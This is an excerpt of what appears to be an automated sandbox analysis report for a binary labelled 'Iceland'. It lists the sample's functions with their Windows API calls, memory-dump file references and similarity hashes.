                                                                                                                                                                                                                                                                Function 00AB92BF Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 00A21F2D: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00A21F87
                                                                                                                                                                                                                                                                  • Part of subcall function 00A21F2D: SelectObject.GDI32(?,00000000), ref: 00A21F96
                                                                                                                                                                                                                                                                  • Part of subcall function 00A21F2D: BeginPath.GDI32(?), ref: 00A21FAD
                                                                                                                                                                                                                                                                  • Part of subcall function 00A21F2D: SelectObject.GDI32(?,00000000), ref: 00A21FD6
                                                                                                                                                                                                                                                                • MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 00AB92E3
                                                                                                                                                                                                                                                                • LineTo.GDI32(?,?,?), ref: 00AB92F0
                                                                                                                                                                                                                                                                • EndPath.GDI32(?), ref: 00AB9300
                                                                                                                                                                                                                                                                • StrokePath.GDI32(?), ref: 00AB930E
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1539411459-0
                                                                                                                                                                                                                                                                • Opcode ID: 42c29bf633297da4397e07b467412511ae5499b4e67e6b03acd60094307aea16
                                                                                                                                                                                                                                                                • Instruction ID: dae3eb1a6ea2aa2cb2d282a6cd953daeb20952a2a4b893507b335c48b2589b41
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 42c29bf633297da4397e07b467412511ae5499b4e67e6b03acd60094307aea16
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 85F05431045255B7DB12AFD4AD0EFDE3F699F09320F048101FA11650F2C7B55512DFA5
                                                                                                                                                                                                                                                                Function 00A221A0 Relevance: 6.0, APIs: 4, Instructions: 23COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetSysColor.USER32(00000008), ref: 00A221BC
                                                                                                                                                                                                                                                                • SetTextColor.GDI32(?,?), ref: 00A221C6
                                                                                                                                                                                                                                                                • SetBkMode.GDI32(?,00000001), ref: 00A221D9
                                                                                                                                                                                                                                                                • GetStockObject.GDI32(00000005), ref: 00A221E1
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Color$ModeObjectStockText
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 4037423528-0
                                                                                                                                                                                                                                                                • Opcode ID: f8bd53c45be136b08a2a3483c8685bb8c4c263815896fbc7c0fc91ceb991c967
                                                                                                                                                                                                                                                                • Instruction ID: f18a062b4ab3185c457df391b3a1826e9da2c6effb8f66ab23a0cd4d964d40df
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f8bd53c45be136b08a2a3483c8685bb8c4c263815896fbc7c0fc91ceb991c967
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 05E09B32240240BEDB219FB8BC09BE93B61AB11335F048329F7F6540F1D77146429B10
                                                                                                                                                                                                                                                                Function 00A7EC36 Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetDesktopWindow.USER32 ref: 00A7EC36
                                                                                                                                                                                                                                                                • GetDC.USER32(00000000), ref: 00A7EC40
                                                                                                                                                                                                                                                                • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00A7EC60
                                                                                                                                                                                                                                                                • ReleaseDC.USER32(?), ref: 00A7EC81
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2889604237-0
                                                                                                                                                                                                                                                                • Opcode ID: cf81e5b8962d11151bdc615e42f2d73e132312820da39fa8ca50454c202cc1d4
                                                                                                                                                                                                                                                                • Instruction ID: 6daf6301aada1350019d2f63f87aff2c4851446c636057eba6ec4c802f40c20f
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cf81e5b8962d11151bdc615e42f2d73e132312820da39fa8ca50454c202cc1d4
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0EE01A74C00205DFCB41EFA4D918A5DBBB1EB08311F108559F84AE3261E7385952AF10
                                                                                                                                                                                                                                                                Function 00A7EC4A Relevance: 6.0, APIs: 4, Instructions: 18COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetDesktopWindow.USER32 ref: 00A7EC4A
                                                                                                                                                                                                                                                                • GetDC.USER32(00000000), ref: 00A7EC54
                                                                                                                                                                                                                                                                • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00A7EC60
                                                                                                                                                                                                                                                                • ReleaseDC.USER32(?), ref: 00A7EC81
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2889604237-0
                                                                                                                                                                                                                                                                • Opcode ID: 88d1b5da5a47bc0014d0d8cdfcba1b4edb034d25a920c03f1c9c75be853a2541
                                                                                                                                                                                                                                                                • Instruction ID: f1297c9df9bfba2dc83e3b9d84ef6686b8a83c1492810edf0ee2245dfd44d52f
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 88d1b5da5a47bc0014d0d8cdfcba1b4edb034d25a920c03f1c9c75be853a2541
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D9E012B0C00205EFCB40EFA4D918A9DBBB1AB08310F108519F84AE32A1EB386912AF00
                                                                                                                                                                                                                                                                Function 00A957CC Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 230shareCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 00A241EA: _wcslen.LIBCMT ref: 00A241EF
                                                                                                                                                                                                                                                                • WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 00A95919
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Connection_wcslen
                                                                                                                                                                                                                                                                • String ID: *$LPT
                                                                                                                                                                                                                                                                • API String ID: 1725874428-3443410124
                                                                                                                                                                                                                                                                • Opcode ID: 6e6dea9204dde49623bc9a033a25fc8fa3ea793ecbaa6f4596d13706743bfe4e
                                                                                                                                                                                                                                                                • Instruction ID: 9d6bff3c280d10cdd29166d7a9587399d108f94f4ac5ff28eb0bc14146a951ff
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6e6dea9204dde49623bc9a033a25fc8fa3ea793ecbaa6f4596d13706743bfe4e
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 13918C75E00614DFDB15DF68C495EAABBF1AF44304F198099E84A9F362C731EE85CB90
                                                                                                                                                                                                                                                                Function 00A4E5ED Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • __startOneArgErrorHandling.LIBCMT ref: 00A4E67D
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ErrorHandling__start
                                                                                                                                                                                                                                                                • String ID: pow
                                                                                                                                                                                                                                                                • API String ID: 3213639722-2276729525
                                                                                                                                                                                                                                                                • Opcode ID: 8ff850642f0010826718cdcb7f43f026bce60bd4ab308308499d203736b87ea9
                                                                                                                                                                                                                                                                • Instruction ID: 3b7a112febaf0f3261c40710ebd4816af623c014e82f51cc56ff70065ae8566d
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8ff850642f0010826718cdcb7f43f026bce60bd4ab308308499d203736b87ea9
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B451AE75E0950186CB11F714CE0177ABBB0BBA0752F318E58F8D1562E8DF3D8C9A9B86
                                                                                                                                                                                                                                                                Function 00A3A8EC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 184COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: #
                                                                                                                                                                                                                                                                • API String ID: 0-1885708031
                                                                                                                                                                                                                                                                • Opcode ID: 8b6b8cb4a817dc1a4f20fdca8b56a7e331121789181df89aa2e4e1a09005e79e
                                                                                                                                                                                                                                                                • Instruction ID: 9f99029d8dda4faa9e01f7ea0ed650ecc48500159e8eaa736424658b662124d5
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8b6b8cb4a817dc1a4f20fdca8b56a7e331121789181df89aa2e4e1a09005e79e
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 82514531944256DFCB25DF28C849BBA7BB0EF25310F24C056F895AB2D0DB789D82CB61
                                                                                                                                                                                                                                                                Function 00A3F6CA Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • Sleep.KERNEL32(00000000), ref: 00A3F6DB
                                                                                                                                                                                                                                                                • GlobalMemoryStatusEx.KERNEL32(?), ref: 00A3F6F4
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: GlobalMemorySleepStatus
                                                                                                                                                                                                                                                                • String ID: @
                                                                                                                                                                                                                                                                • API String ID: 2783356886-2766056989
                                                                                                                                                                                                                                                                • Opcode ID: 273171a100fcab5ded90b01464496f2079b969a8c03297820f3f1d335b538a70
                                                                                                                                                                                                                                                                • Instruction ID: bcf6bdc989dbd80652ffefe6d2c888348ffd6ac11aee75b0599940de2254ab1a
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 273171a100fcab5ded90b01464496f2079b969a8c03297820f3f1d335b538a70
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 055138714097589BD320EF54ED86BABBBF8FB94300F81885DF1D9421A1DF308969CB66
                                                                                                                                                                                                                                                                Function 00AA61A2 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 125COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: BuffCharUpper_wcslen
                                                                                                                                                                                                                                                                • String ID: CALLARGARRAY
                                                                                                                                                                                                                                                                • API String ID: 157775604-1150593374
                                                                                                                                                                                                                                                                • Opcode ID: 3611d0048492b4957ad2cb771287676060b92207dbab4c36264dd59a86b6a141
                                                                                                                                                                                                                                                                • Instruction ID: 7b2da2eb0e0afe864b01ee1600bb1295f3902c6dbe1f2e7de13d8cd803f6e220
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3611d0048492b4957ad2cb771287676060b92207dbab4c36264dd59a86b6a141
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0541B071E00215DFCB04EFA8C981AEEBBB5FF59364F14412AE405A7291EB709D85CF90
                                                                                                                                                                                                                                                                Function 00A9DB39 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 98networkCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 00A9DB75
                                                                                                                                                                                                                                                                • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00A9DB7F
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CrackInternet_wcslen
                                                                                                                                                                                                                                                                • String ID: |
                                                                                                                                                                                                                                                                • API String ID: 596671847-2343686810
                                                                                                                                                                                                                                                                • Opcode ID: 76b5d7f66c30fc85a99b2f5333c0569023fdfadccd9dc2cbf60b6524a1dfdf0f
                                                                                                                                                                                                                                                                • Instruction ID: c14a50a238d2f36da87652f227baf2aec602e6506d28b8436d8102d846f4010d
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 76b5d7f66c30fc85a99b2f5333c0569023fdfadccd9dc2cbf60b6524a1dfdf0f
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2E318B71901119AFCF01EFB4DD85AEEBFB8FF08344F004029F815A6262EB759A46CB60
                                                                                                                                                                                                                                                                Function 00AB4008 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • DestroyWindow.USER32(?,?,?,?), ref: 00AB40BD
                                                                                                                                                                                                                                                                • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00AB40F8
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Window$DestroyMove
                                                                                                                                                                                                                                                                • String ID: static
                                                                                                                                                                                                                                                                • API String ID: 2139405536-2160076837
                                                                                                                                                                                                                                                                • Opcode ID: b288c34c1a1cc8b847a8eec1300cf2e849125ab5398c9a328509c4c62361dc67
                                                                                                                                                                                                                                                                • Instruction ID: be6a88dd985c3d1a9f82112872875e7ea65bafb32e9edea3a03417efc8327de7
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b288c34c1a1cc8b847a8eec1300cf2e849125ab5398c9a328509c4c62361dc67
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 14318D71110604AADB24DF78CC80FFB77ADFF48764F108619FAA587192DA75AC81DBA0
                                                                                                                                                                                                                                                                Function 00AB4FD5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95windowCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000027,00001132,00000000,?), ref: 00AB50BD
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00AB50D2
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: MessageSend
                                                                                                                                                                                                                                                                • String ID: '
                                                                                                                                                                                                                                                                • API String ID: 3850602802-1997036262
                                                                                                                                                                                                                                                                • Opcode ID: fe6c1696e194c7a6ce542fb7d62a45a53620fd9135e03a4cce3aad26ba049c02
                                                                                                                                                                                                                                                                • Instruction ID: 4744b787c065ac88aafbd6e066ecf2bdd2da76094e2f5c631c738697cef4068d
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fe6c1696e194c7a6ce542fb7d62a45a53620fd9135e03a4cce3aad26ba049c02
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9831F874E0160A9FDB14DFA9C981BEE7BB9FF49300F10416AE904AB352D771A945CF90
                                                                                                                                                                                                                                                                Function 00AB3C8B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00AB3D18
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00AB3D23
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: MessageSend
                                                                                                                                                                                                                                                                • String ID: Combobox
